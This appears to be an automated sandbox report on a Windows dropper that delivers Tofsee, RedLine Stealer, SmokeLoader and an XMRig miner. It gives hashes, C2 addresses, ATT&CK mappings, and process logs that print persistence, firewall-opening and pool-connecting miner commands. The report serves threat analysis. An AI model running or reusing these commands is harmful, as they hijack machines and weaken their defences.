Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2022 23:43

General

  • Target

    3f2712bc6ef1dad5d229220704cbb298eb04cf6e061e47a546c9b43e0db12173.exe

  • Size

    196KB

  • MD5

    84c36e818328f085abc25a604c24b297

  • SHA1

    f37797de467c75017007c3ea3209be1e902bacf6

  • SHA256

    3f2712bc6ef1dad5d229220704cbb298eb04cf6e061e47a546c9b43e0db12173

  • SHA512

    dc52bedcb01107f9872950850170bf153efbb32536c8d33ab1dac396bd6a28e7c114496bad28c9248f86489c5a038a1d1b9ee82e83d5663568f7af9c00884d0b

  • SSDEEP

    3072:lLMMsLIBzhIN5Onb3vQU1NZWEGWHQRa2NbMdLqLBK3tYL/PkkXx:mL4hNDvQU1NsNWwRa2NQdLqEy

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @me_golds)

C2

77.73.134.27:7161

Attributes
  • auth_value

    e136da06c7c0400f4091dab1787720ea

Signatures

  • Detects Smokeloader packer 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f2712bc6ef1dad5d229220704cbb298eb04cf6e061e47a546c9b43e0db12173.exe
    "C:\Users\Admin\AppData\Local\Temp\3f2712bc6ef1dad5d229220704cbb298eb04cf6e061e47a546c9b43e0db12173.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:1960
  • C:\Users\Admin\AppData\Local\Temp\CC1.exe
    C:\Users\Admin\AppData\Local\Temp\CC1.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    PID:1972
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:100892
  • C:\Users\Admin\AppData\Local\Temp\ED6.exe
    C:\Users\Admin\AppData\Local\Temp\ED6.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:6296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pnluywpe\
      2⤵
        PID:28628
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lhcfplpa.exe" C:\Windows\SysWOW64\pnluywpe\
        2⤵
          PID:34888
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create pnluywpe binPath= "C:\Windows\SysWOW64\pnluywpe\lhcfplpa.exe /d\"C:\Users\Admin\AppData\Local\Temp\ED6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:40496
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description pnluywpe "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:47540
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start pnluywpe
          2⤵
          • Launches sc.exe
          PID:59312
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:66472
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 1040
          2⤵
          • Program crash
          PID:66908
      • C:\Users\Admin\AppData\Local\Temp\136B.exe
        C:\Users\Admin\AppData\Local\Temp\136B.exe
        1⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:20492
      • C:\Users\Admin\AppData\Local\Temp\15BD.exe
        C:\Users\Admin\AppData\Local\Temp\15BD.exe
        1⤵
        • Executes dropped EXE
        PID:25864
      • C:\Users\Admin\AppData\Local\Temp\1774.exe
        C:\Users\Admin\AppData\Local\Temp\1774.exe
        1⤵
        • Executes dropped EXE
        PID:27820
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:28764
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:40472
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:58912
            • C:\Windows\SysWOW64\pnluywpe\lhcfplpa.exe
              C:\Windows\SysWOW64\pnluywpe\lhcfplpa.exe /d"C:\Users\Admin\AppData\Local\Temp\ED6.exe"
              1⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:62832
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Sets service image path in registry
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                PID:66960
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1532
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 62832 -s 516
                2⤵
                • Program crash
                PID:67108
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:66520
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6296 -ip 6296
                1⤵
                  PID:66576
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                    PID:66992
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 62832 -ip 62832
                    1⤵
                      PID:67068
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:70236
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:83276
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:99756
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:100972
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                              • Accesses Microsoft Outlook profiles
                              • outlook_office_path
                              • outlook_win_path
                              PID:2492
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                                PID:5044
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:2768

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                New Service

                                1
                                T1050

                                Modify Existing Service

                                1
                                T1031

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Privilege Escalation

                                New Service

                                1
                                T1050

                                Defense Evasion

                                Modify Registry

                                1
                                T1112

                                Credential Access

                                Credentials in Files

                                1
                                T1081

                                Discovery

                                Query Registry

                                2
                                T1012

                                System Information Discovery

                                3
                                T1082

                                Peripheral Device Discovery

                                1
                                T1120

                                Collection

                                Email Collection

                                1
                                T1114

                                Data from Local System

                                1
                                T1005

                                Command and Control

                                Web Service

                                1
                                T1102

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\136B.exe
                                  Filesize

                                  187KB

                                  MD5

                                  ed89332cb4fb426b7e9ad5d8853be58f

                                  SHA1

                                  4c6dbd10b19dd0a53d76bc8ca8c5df055a5f0ccc

                                  SHA256

                                  56c77e5efa069fdbea2beaf1cbb234735d6aa70eba0fe50b736ab5f9bbe6e69a

                                  SHA512

                                  9f23967e804be45bf892f7c1c1590efe633ae34ddb4d953f8a29ea14febdda51ae217e9c38e59acbbf9e578d5564fd50d6239d15b57495884adfd07ece988862

                                • C:\Users\Admin\AppData\Local\Temp\136B.exe
                                  Filesize

                                  187KB

                                  MD5

                                  ed89332cb4fb426b7e9ad5d8853be58f

                                  SHA1

                                  4c6dbd10b19dd0a53d76bc8ca8c5df055a5f0ccc

                                  SHA256

                                  56c77e5efa069fdbea2beaf1cbb234735d6aa70eba0fe50b736ab5f9bbe6e69a

                                  SHA512

                                  9f23967e804be45bf892f7c1c1590efe633ae34ddb4d953f8a29ea14febdda51ae217e9c38e59acbbf9e578d5564fd50d6239d15b57495884adfd07ece988862

                                • C:\Users\Admin\AppData\Local\Temp\15BD.exe
                                  Filesize

                                  318KB

                                  MD5

                                  b6b5a45936d78a60be580119441bb7af

                                  SHA1

                                  283b6dcb99307937a4bf2b8f012b256dcaf048fa

                                  SHA256

                                  def0d469af4c4f9f56cad1ff76b4e9cc34f2877a23561f9c4943a28bcd12f0f6

                                  SHA512

                                  a94b025c25400091b399d593e5aab7a9150df7af8ccea24b572e6ffcf74c2dfd33273e80df965c9f31fd165e379307da54a1800088f2826ae693c34ab6f80989

                                • C:\Users\Admin\AppData\Local\Temp\15BD.exe
                                  Filesize

                                  318KB

                                  MD5

                                  b6b5a45936d78a60be580119441bb7af

                                  SHA1

                                  283b6dcb99307937a4bf2b8f012b256dcaf048fa

                                  SHA256

                                  def0d469af4c4f9f56cad1ff76b4e9cc34f2877a23561f9c4943a28bcd12f0f6

                                  SHA512

                                  a94b025c25400091b399d593e5aab7a9150df7af8ccea24b572e6ffcf74c2dfd33273e80df965c9f31fd165e379307da54a1800088f2826ae693c34ab6f80989

                                • C:\Users\Admin\AppData\Local\Temp\1774.exe
                                  Filesize

                                  365KB

                                  MD5

                                  3266a8079097e81f5cf4eb9cfa481626

                                  SHA1

                                  e6db3ed9bab01ad9bbec78ea2e2bab92bdcbcc3a

                                  SHA256

                                  8fe0766e52fe6f05622654a41ea8b33fca6c5251fd659eb4cc126a3059b1513d

                                  SHA512

                                  0f71cee2c8e776d2a46940b257d6fbd54023a6dd22d66ce2869ca1b75df868fa770c88930de0230fe9b340f3127f2265c54bf374e17c4c3a7ea993ffac68abed

                                • C:\Users\Admin\AppData\Local\Temp\1774.exe
                                  Filesize

                                  365KB

                                  MD5

                                  3266a8079097e81f5cf4eb9cfa481626

                                  SHA1

                                  e6db3ed9bab01ad9bbec78ea2e2bab92bdcbcc3a

                                  SHA256

                                  8fe0766e52fe6f05622654a41ea8b33fca6c5251fd659eb4cc126a3059b1513d

                                  SHA512

                                  0f71cee2c8e776d2a46940b257d6fbd54023a6dd22d66ce2869ca1b75df868fa770c88930de0230fe9b340f3127f2265c54bf374e17c4c3a7ea993ffac68abed

                                • C:\Users\Admin\AppData\Local\Temp\CC1.exe
                                  Filesize

                                  2.6MB

                                  MD5

                                  ea6fee4ce432602e3dd2b849f8396027

                                  SHA1

                                  5151b46012f637fe7fdbda551be1651009eb453a

                                  SHA256

                                  b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                  SHA512

                                  b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                • C:\Users\Admin\AppData\Local\Temp\CC1.exe
                                  Filesize

                                  2.6MB

                                  MD5

                                  ea6fee4ce432602e3dd2b849f8396027

                                  SHA1

                                  5151b46012f637fe7fdbda551be1651009eb453a

                                  SHA256

                                  b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                  SHA512

                                  b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                • C:\Users\Admin\AppData\Local\Temp\ED6.exe
                                  Filesize

                                  196KB

                                  MD5

                                  40a52fcc516e86ac6c01895d22310200

                                  SHA1

                                  584bb6a661bab56e24d3004611495f9616e5e613

                                  SHA256

                                  e6894ac64117268d9f2b1e4ab6e24826a91cdbfbf052075cefb342cffef92314

                                  SHA512

                                  6df7a6b483b2a5d191a665760e684598b97b181491fc85f215259eb27617c53e3345bf9c4b87943a160d515c78e8474b24ef9f08a6fb7fc244783158c44d0d60

                                • C:\Users\Admin\AppData\Local\Temp\ED6.exe
                                  Filesize

                                  196KB

                                  MD5

                                  40a52fcc516e86ac6c01895d22310200

                                  SHA1

                                  584bb6a661bab56e24d3004611495f9616e5e613

                                  SHA256

                                  e6894ac64117268d9f2b1e4ab6e24826a91cdbfbf052075cefb342cffef92314

                                  SHA512

                                  6df7a6b483b2a5d191a665760e684598b97b181491fc85f215259eb27617c53e3345bf9c4b87943a160d515c78e8474b24ef9f08a6fb7fc244783158c44d0d60

                                • C:\Users\Admin\AppData\Local\Temp\lhcfplpa.exe
                                  Filesize

                                  10.7MB

                                  MD5

                                  df6df52c4d715c28e1755353863e5ec8

                                  SHA1

                                  8114bee22b7908c8c7c3369feaebc058d92ae2e0

                                  SHA256

                                  4d6d8ded46ce8762c3997c033a3c522569e02338799ce2b76296431e7f0e2007

                                  SHA512

                                  21186942402ba0bd5da717de11829308ad774726a542083e90da587d97212fdc86aa12c75f85b8703a2ecb4525709af62744c1798c46d61b616ed77aa0559d80

                                • C:\Windows\SysWOW64\pnluywpe\lhcfplpa.exe
                                  Filesize

                                  10.7MB

                                  MD5

                                  df6df52c4d715c28e1755353863e5ec8

                                  SHA1

                                  8114bee22b7908c8c7c3369feaebc058d92ae2e0

                                  SHA256

                                  4d6d8ded46ce8762c3997c033a3c522569e02338799ce2b76296431e7f0e2007

                                  SHA512

                                  21186942402ba0bd5da717de11829308ad774726a542083e90da587d97212fdc86aa12c75f85b8703a2ecb4525709af62744c1798c46d61b616ed77aa0559d80

                                • memory/1532-243-0x0000000000D00000-0x0000000000DF1000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/1532-242-0x0000000000000000-mapping.dmp
                                • memory/1532-248-0x0000000000D00000-0x0000000000DF1000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/1960-134-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/1960-135-0x00000000008B8000-0x00000000008C9000-memory.dmp
                                  Filesize

                                  68KB

                                • memory/1960-132-0x00000000008B8000-0x00000000008C9000-memory.dmp
                                  Filesize

                                  68KB

                                • memory/1960-137-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/1960-136-0x0000000000710000-0x0000000000719000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/1960-133-0x0000000000710000-0x0000000000719000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/1972-138-0x0000000000000000-mapping.dmp
                                • memory/2492-258-0x0000000000EE0000-0x0000000000F4B000-memory.dmp
                                  Filesize

                                  428KB

                                • memory/2492-254-0x0000000000F50000-0x0000000000FC5000-memory.dmp
                                  Filesize

                                  468KB

                                • memory/2492-253-0x0000000000000000-mapping.dmp
                                • memory/2492-255-0x0000000000EE0000-0x0000000000F4B000-memory.dmp
                                  Filesize

                                  428KB

                                • memory/2768-264-0x00000000010F0000-0x0000000001112000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/2768-262-0x00000000010F0000-0x0000000001112000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/2768-259-0x0000000000000000-mapping.dmp
                                • memory/2768-263-0x00000000010C0000-0x00000000010E7000-memory.dmp
                                  Filesize

                                  156KB

                                • memory/5044-257-0x0000000000700000-0x000000000070C000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/5044-256-0x0000000000000000-mapping.dmp
                                • memory/6296-150-0x00000000006F0000-0x0000000000703000-memory.dmp
                                  Filesize

                                  76KB

                                • memory/6296-186-0x0000000000799000-0x00000000007A9000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/6296-187-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/6296-152-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/6296-149-0x0000000000799000-0x00000000007A9000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/6296-141-0x0000000000000000-mapping.dmp
                                • memory/20492-144-0x0000000000000000-mapping.dmp
                                • memory/20492-184-0x0000000000400000-0x0000000000589000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/20492-153-0x00000000005C9000-0x00000000005DA000-memory.dmp
                                  Filesize

                                  68KB

                                • memory/20492-154-0x0000000002080000-0x0000000002089000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/20492-155-0x0000000000400000-0x0000000000589000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/25864-147-0x0000000000000000-mapping.dmp
                                • memory/27820-156-0x0000000000000000-mapping.dmp
                                • memory/28628-159-0x0000000000000000-mapping.dmp
                                • memory/28764-163-0x0000000000EF0000-0x0000000000EF7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/28764-215-0x0000000000EF0000-0x0000000000EF7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/28764-164-0x0000000000EE0000-0x0000000000EEB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/28764-160-0x0000000000000000-mapping.dmp
                                • memory/34888-161-0x0000000000000000-mapping.dmp
                                • memory/40472-216-0x00000000012D0000-0x00000000012D9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/40472-165-0x0000000000000000-mapping.dmp
                                • memory/40472-168-0x00000000012D0000-0x00000000012D9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/40472-169-0x00000000012C0000-0x00000000012CF000-memory.dmp
                                  Filesize

                                  60KB

                                • memory/40496-166-0x0000000000000000-mapping.dmp
                                • memory/47540-167-0x0000000000000000-mapping.dmp
                                • memory/58912-173-0x0000000000EF0000-0x0000000000EF5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/58912-170-0x0000000000000000-mapping.dmp
                                • memory/58912-174-0x0000000000EE0000-0x0000000000EE9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/58912-217-0x0000000000EF0000-0x0000000000EF5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/59312-171-0x0000000000000000-mapping.dmp
                                • memory/62832-188-0x00000000008C2000-0x00000000008D3000-memory.dmp
                                  Filesize

                                  68KB

                                • memory/62832-190-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/62832-179-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/66472-175-0x0000000000000000-mapping.dmp
                                • memory/66520-176-0x0000000000000000-mapping.dmp
                                • memory/66520-177-0x0000000000580000-0x0000000000586000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/66520-178-0x0000000000570000-0x000000000057C000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/66960-227-0x00000000009C0000-0x00000000009C6000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/66960-236-0x0000000007400000-0x000000000780B000-memory.dmp
                                  Filesize

                                  4.0MB

                                • memory/66960-180-0x0000000000000000-mapping.dmp
                                • memory/66960-181-0x0000000000800000-0x0000000000815000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/66960-189-0x0000000000800000-0x0000000000815000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/66960-239-0x0000000001BE0000-0x0000000001BE7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/66960-233-0x00000000009F0000-0x00000000009F5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/66960-230-0x00000000009E0000-0x00000000009F0000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/66960-223-0x0000000002400000-0x000000000260F000-memory.dmp
                                  Filesize

                                  2.1MB

                                • memory/66960-218-0x0000000000800000-0x0000000000815000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/66992-219-0x0000000000ED0000-0x0000000000EF2000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/66992-182-0x0000000000000000-mapping.dmp
                                • memory/66992-192-0x0000000000EA0000-0x0000000000EC7000-memory.dmp
                                  Filesize

                                  156KB

                                • memory/66992-191-0x0000000000ED0000-0x0000000000EF2000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/70236-193-0x0000000000000000-mapping.dmp
                                • memory/70236-195-0x0000000000EE0000-0x0000000000EE9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/70236-220-0x0000000000EF0000-0x0000000000EF5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/70236-194-0x0000000000EF0000-0x0000000000EF5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/83276-198-0x00000000012E0000-0x00000000012EB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/83276-196-0x0000000000000000-mapping.dmp
                                • memory/83276-197-0x00000000012F0000-0x00000000012F6000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/99756-249-0x0000000000DB0000-0x0000000000DB7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/99756-207-0x0000000000DA0000-0x0000000000DAD000-memory.dmp
                                  Filesize

                                  52KB

                                • memory/99756-199-0x0000000000000000-mapping.dmp
                                • memory/99756-206-0x0000000000DB0000-0x0000000000DB7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/100892-260-0x0000000006C90000-0x0000000006D06000-memory.dmp
                                  Filesize

                                  472KB

                                • memory/100892-211-0x0000000005670000-0x0000000005C88000-memory.dmp
                                  Filesize

                                  6.1MB

                                • memory/100892-221-0x0000000005540000-0x00000000055D2000-memory.dmp
                                  Filesize

                                  584KB

                                • memory/100892-251-0x00000000069C0000-0x0000000006B82000-memory.dmp
                                  Filesize

                                  1.8MB

                                • memory/100892-252-0x00000000070C0000-0x00000000075EC000-memory.dmp
                                  Filesize

                                  5.2MB

                                • memory/100892-214-0x0000000005180000-0x00000000051BC000-memory.dmp
                                  Filesize

                                  240KB

                                • memory/100892-200-0x0000000000000000-mapping.dmp
                                • memory/100892-222-0x0000000006240000-0x00000000067E4000-memory.dmp
                                  Filesize

                                  5.6MB

                                • memory/100892-261-0x0000000006970000-0x00000000069C0000-memory.dmp
                                  Filesize

                                  320KB

                                • memory/100892-224-0x00000000055E0000-0x0000000005646000-memory.dmp
                                  Filesize

                                  408KB

                                • memory/100892-213-0x0000000005120000-0x0000000005132000-memory.dmp
                                  Filesize

                                  72KB

                                • memory/100892-201-0x0000000000400000-0x0000000000428000-memory.dmp
                                  Filesize

                                  160KB

                                • memory/100892-212-0x00000000051F0000-0x00000000052FA000-memory.dmp
                                  Filesize

                                  1.0MB

                                • memory/100972-210-0x0000000000E90000-0x0000000000E9B000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/100972-209-0x0000000000EA0000-0x0000000000EA8000-memory.dmp
                                  Filesize

                                  32KB

                                • memory/100972-208-0x0000000000000000-mapping.dmp
                                • memory/100972-250-0x0000000000EA0000-0x0000000000EA8000-memory.dmp
                                  Filesize

                                  32KB